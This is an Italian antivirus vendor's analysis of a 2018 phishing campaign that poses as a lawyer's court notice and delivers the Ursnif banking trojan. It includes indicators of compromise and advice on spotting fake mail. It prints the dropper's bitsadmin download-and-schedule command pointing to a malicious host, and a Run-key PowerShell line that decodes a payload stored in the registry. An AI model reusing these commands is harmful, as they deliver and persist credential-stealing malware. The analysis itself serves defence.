23/08/2018
16:22

Nuova campagna e-mail "Sentenza dell'avvocato" colpisce ancora ma veicola il trojan bancario e password stealer UrSnif anzichè il collega GootKit

Campagna e-mail avente per oggetto:"Relazione di notifica atto No.XYZ Del gg/mm/aa" ora veicola il temibile UrSnif o meglio la nuova variante di UrSnif che implementa tecniche di elusione dei controlli AV simil-FileLess.
      
 
 

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una mail della campagna che diffonde il malware Trojan Banker Ursnif  in data  23 agosto  2018

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

INDICE
 

Falsa Mail diffonde Trojan "Ursnif"

Nome: Trojan.Win32.Ursnif
Famiglia malware: Ursnif
VirIT: Trojan.Win32.Ursnif.IK

Descrizione:
La mail è stata rilevata nella mattina del  23 agosto  2018

Esempio di email analizzata:

Oggetto: Relazione di notifica atto No.4521856636 Del 14/06/18 

 immagine_1
ingrandire immagine

Torna ad inizio pagina

Come si diffonde:
La mail contiene un breve messaggio di un atto di notifica inviato da un sedicente avvocato. Nella prima parte del  del messaggio viene citato sia il nome fittizio dell'avvocato e sia il nome della persona rappresentata, unito ad alcuni dati personali dell' "avvocato" stesso e del cliente.

Nella seconda parte del messaggio viene riportata la finta sentenza con relativo codice di riconoscimento della stessa  invitandoci  a scaricarla  cliccando sul link evidenziato in blu "Sentenza".

Se si cliccherà sul link si verrà indirizzati ad un pagina web compromessa: http[:]//www[.]lindequipment[.]com/fbfx?pqi=320897 da cui viene scaricato un file .ZIP di nome  "Nuovo documento1.zip".

L'archivio Zip appena scaricato contiene due file:

  • help2.jpg:un immagine in cui ci vengono riportate alcune informazione.
  • Nuovo documento1.vbs:Vbscript per il download del malware
Dopo aver  lanciato il file "Nuovo documento1.vbs", verrà eseguito il seguente comando:

C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://suremummy[.]com/pagverd75[.]php C:\Users\[UTENTE PC]\AppData\Local\Temp/ePlXhIq.exe &schtasks /create /st 15:00 /sc once /tn sds3 /tr C:\Users\[UTENTE PC]\AppData\Local\Temp/ePlXhIq.exe

come si può vedere viene aperta una connessione internet verso l' indirizzo: http[:]//suremummy[.]com/pagverd75[.]php da cui  viene eseguito il download del file malevolo" ePlXhIq.exe" nella cartella dei file temporanei dell'utente (%temp%) e creato un task che avvia l'esecuzione del file appena scaricato ad un orario specifico. Nel caso analizzato il malware ha impostato il suo avvio dopo 7 minuti dalla creazione del task oppure al primo riavvio effettuato dall'utente.Questo intervallo temporale viene spesso utilizzato per eludere l'analisi del malware attraverso sandbox.
  • Nome File: ePlXhIq.exe   
  • Dimesnione: 462.608 byte
  • Md5: D236F9AAD941974C2B44BF7DEBD2A19B                                                   

Una volta avviato, il file "ePlXhIq.exe" provvede a creare la seguente chiave di registro:


HKCU\Software\AppDataLow\Software\Microsoft\397FA2FA-441F-D3A1-167D-B8B7AA016CDB

La quale contiene le seguenti sottochiavi (vedi immagine sotto):

  • F8C486F9-F7C3-EA50-41AC-1BBE05A07FD2
  • {091333CC-D480-23F6-264D-4807BAD1FC2B}
  • {F8C486F9-F7C3-EA50-41AC-1BBE05A07FD2}
  • apilthlp
  • Client
  • Client32
  • LastTask

queste sottochiavi contengono il codice del malware che viene caricato ad ogni avvio del pc grazie ad una chiave RUN:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[bdeutstr] = cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\397FA2FA-441F-D3A1-167D-B8B7AA016CDB').apilthlp))


Successivamente il file  "ePlXhIq.exe" viene cancellato.


La chiave di RUN attraverso "powershell" provvede a decodificare la sottochiave apilthlp la quale contiene uno script che provvede a sua volta a caricare il malware ed  effettuare l'injection attraverso QueueUserAPC.

Questa tipologia di malware permette di sottrarci le nostre preziose password ed impadronirsi d'informazioni personali sensibili come account di posta, home banking, social network ecc...

La stessa tipologia di mail in passato distribuiva il malware GootKit la cui analisi da parte del CRAM di TGSoft è disponibile a questi indirizzi:


IOC


MD5:
929A9313A7AED7C8B79E821287A77B96
D236F9AAD941974C2B44BF7DEBD2A19B

URL:
http[:]//www[.]lindequipment[.]com/fbfx?pqi=320897
http[:]//suremummy[.]com/pagverd75[.]php


Torna ad inizio pagina

 

Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker,  il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui  la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.  


Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
  1. qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
  2. salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Torna ad inizio pagina
 


Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:
  • liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
  • interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
  • identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
  • grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
  • Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.
 


C.R.A.M.
Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina
Ogni informazioni pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente “Fonte: C.R.A.M. by TG Soft www.tgsoft.it” con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito “Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]”

Vir.IT eXplorer PRO è certificato dai maggiori enti internazionali: